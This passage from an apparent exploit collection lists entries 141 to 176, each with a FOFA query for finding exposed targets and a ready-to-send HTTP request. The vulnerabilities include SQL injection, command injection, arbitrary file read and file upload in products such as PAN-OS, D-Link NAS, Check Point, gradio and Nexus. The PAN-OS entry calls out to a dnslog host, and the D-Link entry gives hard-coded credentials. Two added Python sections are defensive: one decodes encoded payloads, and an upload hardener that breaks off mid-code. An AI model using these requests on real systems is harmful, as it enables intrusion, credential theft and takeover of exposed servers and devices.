Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch platform ajax_users.php SQL injection
FOFA: body="指挥调度管理平台"
Union-based: the md5(1) hash appears in the response when the injection succeeds.
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform default credentials
CVE-2024-29666
FOFA: body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link NAS nas_sharing.cgi command injection
CVE-2024-3272 (hard-coded account) and CVE-2024-3273 (command injection)
FOFA: app="D_Link-DNS-ShareCenter"
The user/passwd pair is the built-in account mydlinkBRionyg with password abc12345cba (YWJjMTIzNDVjYmE is its base64 with the padding dropped); the system parameter carries the command to execute, base64-encoded (aWQ= is id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
The SESSID cookie value is used as a file name under the device telemetry directory without sanitisation; the backtick-quoted command runs when telemetry is processed, so the callback is not immediate.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"
url=cnRzcDovL2EK is base64 for rtsp://a and transport decodes to || (echo '[S]'; id; echo '[E]')#; so the command output is delimited by [S] and [E] in the response.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
Send raw, as with entry 126; the target is Windows, hence win.ini.
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source dashboard remote command execution
FOFA: title="AJ-Report"
The ;swagger-ui/ path segment defeats the authentication filter's whitelist match, and validationRules is evaluated as a script on the server. This entry runs ipconfig (Windows hosts); entry 150 is the same request with id for Linux hosts.

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA: title="AJ-Report"
The request as given only shows the unauthenticated reach of the endpoint through the ;swagger-ui/ segment; the injectable parameter is not included in the original PoC.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
The Basic-auth user name is passed to a shell unescaped; JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, so ls runs and the password is irrelevant.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

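Several entries in this list carry their real payload in an encoded field: the base64 sql parameter of entry 122, the base64 passwd and system parameters of entry 144, the base64 url and percent-encoded transport of entry 146, and the Basic-auth header of entry 152. The helper below is an added example (not code from the original post) that takes a request line plus headers and returns the decoded form of every such field, so a reviewer can read what a captured request actually does. The base64 test is a heuristic (shape plus readable UTF-8) and the padding-restoration covers PoCs that drop trailing = characters.

```python
import base64
import binascii
import re
from typing import Dict, Iterator, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def b64_lenient(value: str) -> Optional[str]:
    """Base64-decode a field, restoring padding that PoCs often drop.

    Returns the text only if the value is base64-shaped and decodes to readable UTF-8.
    This is a heuristic: an ordinary word whose length is a multiple of four can in
    principle decode to printable bytes, so treat the output as a hint, not proof.
    """
    if len(value) < 4 or not B64_SHAPE.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if all(c.isprintable() or c.isspace() for c in text):
        return text
    return None


def raw_query_pairs(query: str) -> Iterator[Tuple[str, str]]:
    """Split a query string without decoding values, so '=' padding inside base64 survives."""
    for part in query.split("&"):
        if part:
            key, _, raw = part.partition("=")
            yield unquote_plus(key), raw


def decode_request_fields(request_line: str, headers: Dict[str, str]) -> Dict[str, str]:
    """Return {field: plaintext} for each query parameter or Basic-auth header hiding a payload.

    A field is reported when it is base64 (decoded form shown) or when percent-decoding
    changes it (decoded form shown). Fields that are already plain text are left out.
    """
    _method, target, _version = request_line.split(" ", 2)
    found: Dict[str, str] = {}
    for key, raw in raw_query_pairs(urlsplit(target).query):
        plain = unquote_plus(raw)
        decoded = b64_lenient(plain)
        if decoded is not None:
            found[key] = decoded
        elif plain != raw:
            found[key] = plain
    auth = headers.get("Authorization", "")
    if auth.startswith("Basic "):
        creds = b64_lenient(auth[len("Basic "):].strip())
        if creds is not None:
            found["Authorization"] = creds  # user:password; the part before ':' is what gets injected
    return found


if __name__ == "__main__":
    # Request lines taken from entries 122, 144, 146 and 152 above.
    samples = [
        ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1", {}),
        ("GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1", {}),
        ("GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1", {}),
        ("GET /access/set?param=enableapi&value=1 HTTP/1.1", {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}),
    ]
    for line, hdrs in samples:
        print(line.split(" ")[1], decode_request_fields(line, hdrs))
```

The same routine applied to the Kirisun requests (entries 137 to 140) simply returns the percent-decoded SQL, since those values are not base64-shaped.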
153. gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config to obtain the component ids (component_id below is one of them)
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into gradio's temporary cache directory
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy at the path returned by step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire and rescue dispatch platform SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
Time-based blind injection through the gsdwid field; PG_SLEEP shows the backend is PostgreSQL, so MySQL-style SLEEP() payloads will not work here.
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response echoes the stored path (the server renames the file); request it to confirm execution, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

The same request as raw HTTP. The mdc value is the URL-encoded command `echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;`, and the only credential the request carries is the Cookie: uid=1 header:
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is served from:
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid produces a database error on vulnerable builds; entry 187 below carries a time-based payload for the same CVE.

159. INFINITT (英飞达) PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the file content (shown as PAYLOAD, the page's placeholder for long payloads). The uploaded web service is then reachable at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

A vulnerable instance returns the contents of /etc/passwd. Sonatype fixed this in Nexus Repository 3.68.1.

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (the traversal in it places the file in the web root), <fileFlow> carries the file content, base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file:
http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field chooses the target directory; the file is then served from:
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园/安校易) campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The server stores the upload under a fixed name:
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

Boolean-based injection through the sortOrder parameter; the URL is truncated in the source.

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Error-based: the CHAR() chain builds the string 'hello', and a vulnerable MSSQL backend reports the failed conversion of that string in its error message.

167. Lean Value Management System (精益价值管理系统, LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path parameter is in the application's own encoding, reproduced here as published.

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Time-based (MSSQL WAITFOR DELAY): a vulnerable instance answers about 5 seconds late. Note the /templates/attestation/../../ prefix, which is what reaches the handler without authentication.

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Time-based (MySQL SLEEP). The ;downloadLogger.action path parameter is part of the request as published; the servlet container strips it before routing to delete.do.

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Send the request line verbatim; most HTTP clients normalize the leading ../ away before sending.

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

A vulnerable gateway returns the file content in the response body.

174. Jinher OA C6 (金和OA C6) FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinher OA C6 (金和OA C6) IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

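The upload entries above (155, 157, 159, 161, 162, 163, 164 and 176) share one server-side pattern: the name and Content-Type the client sends are trusted, so a .php/.jsp/.aspx body is stored under a name the server will execute, and in entry 161 a ../ prefix in the name even picks the directory. The following is an added example, not code from the page or from any product listed on it. It places that pattern next to a hardened acceptor; the upload directory, the signature table and the sample file contents are assumptions constructed for the example.

```python
import posixpath
import re
import secrets

UPLOAD_DIR = "/var/www/files/upload"  # assumed location for the example

# Allow-listed extensions and the file signature (magic bytes) each must carry.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Server-side script extensions that must not appear anywhere in a stored name.
SCRIPT_EXTS = {"php", "php3", "php5", "phtml", "phar", "jsp", "jspx",
               "asp", "aspx", "asmx", "ashx", "cer", "cfm"}

# Sample payloads (constructed): the PHP body from entry 155 and a PNG header stub.
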